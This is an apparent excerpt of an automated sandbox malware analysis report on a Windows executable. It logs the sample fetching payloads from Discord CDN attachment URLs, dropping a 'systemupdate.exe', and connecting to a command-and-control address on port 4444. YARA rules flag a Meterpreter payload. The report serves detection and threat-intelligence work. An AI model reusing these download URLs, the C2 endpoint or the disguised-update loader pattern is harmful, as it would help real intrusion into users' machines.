      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp22_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then lea edx, dword ptr [r9+r9*4]22_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov rax, rcx22_2_00007FF75F8D2A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, rcx22_2_00007FF75F8E1940
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx+10h]22_2_00007FF75F8E0870
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx]22_2_00007FF75F8C6640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1522_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp22_2_00007FF75F960690
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1522_2_00007FF75F900500
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi22_2_00007FF75F944440
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi22_2_00007FF75F8FC490
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then xor eax, eax22_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]22_2_00007FF75F8DC189

      Networking

      barindex
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Malware configuration extractorURLs: 89.84.63.139
      Source: global trafficTCP traffic: 192.168.2.7:49702 -> 89.84.63.139:4444
      Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
      Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
      Source: Joe Sandbox ViewASN Name: BOUYGTEL-ISPFR BOUYGTEL-ISPFR
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownTCP traffic detected without corresponding DNS query: 89.84.63.139
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8B1703 InternetOpenA,InternetOpenA,GetLastError,InternetOpenUrlA,InternetOpenUrlA,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF75F8B1703
      Source: global trafficHTTP traffic detected: GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1User-Agent: DownloaderHost: cdn.discordapp.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b& HTTP/1.1User-Agent: DownloaderHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A; _cfuvid=bU7nF5VnNYVA.5nawcWS8uqB9Y.KCne1Dnja3l1cffI-1733395264866-0.0.1.1-604800000
      Source: global trafficHTTP traffic detected: GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1User-Agent: DownloaderHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A
      Source: global trafficHTTP traffic detected: GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1User-Agent: DownloaderHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A
      Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
      Source: sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
      Source: sNifdpWiY9.exe, 00000000.00000002.1298174073.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23DC000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
      Source: sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/V
      Source: ConDrv.0.dr, ConDrv.16.dr, ConDrv.22.drString found in binary or memory: https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c6
      Source: ConDrv.22.drString found in binary or memory: https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528
      Source: sNifdpWiY9.exe, 00000000.00000003.1296804041.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000000.00000002.1298174073.00000202F43A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/n
      Source: sNifdpWiY9.exeString found in binary or memory: https://gcc.gnu.org/bugs/):
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49700 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49735 version: TLS 1.2
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4178D0 calloc,CryptAcquireContextW,GetLastError,CryptGenRandom,GetLastError,CryptImportKey,free,9_2_000001DE4A4178D0

      System Summary

      barindex
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter payload Author: ditekSHen
      Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
      Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter payload Author: ditekSHen
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter payload Author: ditekSHen
      Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
      Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter payload Author: ditekSHen
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter payload Author: ditekSHen
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter payload Author: ditekSHen
      Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
      Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
      Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter payload Author: ditekSHen
      Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
      Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter payload Author: ditekSHen
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3D9D70 NtAllocateVirtualMemory,9_2_000001DE4A3D9D70
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3D9DCC NtProtectVirtualMemory,9_2_000001DE4A3D9DCC
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8B50C00_2_00007FF75F8B50C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8CF0C00_2_00007FF75F8CF0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8FB0C00_2_00007FF75F8FB0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9510F00_2_00007FF75F9510F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F80500_2_00007FF75F8F8050
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F00800_2_00007FF75F8F0080
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8FEFD00_2_00007FF75F8FEFD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F908F200_2_00007FF75F908F20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8C9F900_2_00007FF75F8C9F90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F94EEE00_2_00007FF75F94EEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8ECF0A0_2_00007FF75F8ECF0A
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8D3F000_2_00007FF75F8D3F00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F9EFD0_2_00007FF75F8F9EFD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8DDE200_2_00007FF75F8DDE20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8D7E800_2_00007FF75F8D7E80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F905E000_2_00007FF75F905E00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8E8CD00_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F2CDF0_2_00007FF75F8F2CDF
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F914C700_2_00007FF75F914C70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F916B900_2_00007FF75F916B90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F909AD00_2_00007FF75F909AD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8E2AF00_2_00007FF75F8E2AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F9AF00_2_00007FF75F8F9AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F904AE00_2_00007FF75F904AE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8E3A200_2_00007FF75F8E3A20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8C1A900_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F6A900_2_00007FF75F8F6A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F984A000_2_00007FF75F984A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F913A100_2_00007FF75F913A10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8D89200_2_00007FF75F8D8920
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8C68400_2_00007FF75F8C6840
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9D18680_2_00007FF75F9D1868
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9037D00_2_00007FF75F9037D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8DD7200_2_00007FF75F8DD720
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9127900_2_00007FF75F912790
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9D17880_2_00007FF75F9D1788
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9D17600_2_00007FF75F9D1760
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8D96C00_2_00007FF75F8D96C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9D17000_2_00007FF75F9D1700
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9D16F80_2_00007FF75F9D16F8
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8BD7100_2_00007FF75F8BD710
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F90A6200_2_00007FF75F90A620
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8EB6400_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F26700_2_00007FF75F8F2670
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8FE5300_2_00007FF75F8FE530
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8D15400_2_00007FF75F8D1540
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8C15800_2_00007FF75F8C1580
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9024B00_2_00007FF75F9024B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8FB4CD0_2_00007FF75F8FB4CD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9114B00_2_00007FF75F9114B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8C54E00_2_00007FF75F8C54E0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8EC4180_2_00007FF75F8EC418
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F14600_2_00007FF75F8F1460
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8EA4800_2_00007FF75F8EA480
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9083D00_2_00007FF75F9083D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8C82400_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9101F00_2_00007FF75F9101F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F94D1800_2_00007FF75F94D180
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9011600_2_00007FF75F901160
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F90B1900_2_00007FF75F90B190
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8F41810_2_00007FF75F8F4181
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3DA0F89_2_000001DE4A3DA0F8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3EBC3C9_2_000001DE4A3EBC3C
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3D683C9_2_000001DE4A3D683C
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3EA1049_2_000001DE4A3EA104
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3E50F49_2_000001DE4A3E50F4
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3F08E89_2_000001DE4A3F08E8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3F5D389_2_000001DE4A3F5D38
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3E11749_2_000001DE4A3E1174
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3F29B89_2_000001DE4A3F29B8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3E9DF89_2_000001DE4A3E9DF8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3F1A549_2_000001DE4A3F1A54
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3F46489_2_000001DE4A3F4648
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3F4EAC9_2_000001DE4A3F4EAC
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3DAF289_2_000001DE4A3DAF28
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3ECB7C9_2_000001DE4A3ECB7C
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3EC7CC9_2_000001DE4A3EC7CC
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC3241609_2_00007FF6EC324160
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC327BD09_2_00007FF6EC327BD0
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC3254C09_2_00007FF6EC3254C0
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A42883C9_2_000001DE4A42883C
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A41343C9_2_000001DE4A41343C
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A42D4E89_2_000001DE4A42D4E8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A421CF49_2_000001DE4A421CF4
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A416CF89_2_000001DE4A416CF8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A426D049_2_000001DE4A426D04
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A41DD749_2_000001DE4A41DD74
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4329389_2_000001DE4A432938
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4269F89_2_000001DE4A4269F8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A42F5B89_2_000001DE4A42F5B8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4312489_2_000001DE4A431248
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A42E6549_2_000001DE4A42E654
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A431AAC9_2_000001DE4A431AAC
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A42977C9_2_000001DE4A42977C
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A417B289_2_000001DE4A417B28
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4293CC9_2_000001DE4A4293CC
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8B50C012_2_00007FF75F8B50C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8CF0C012_2_00007FF75F8CF0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8FB0C012_2_00007FF75F8FB0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9510F012_2_00007FF75F9510F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F805012_2_00007FF75F8F8050
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F008012_2_00007FF75F8F0080
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8FEFD012_2_00007FF75F8FEFD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F908F2012_2_00007FF75F908F20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8C9F9012_2_00007FF75F8C9F90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F94EEE012_2_00007FF75F94EEE0
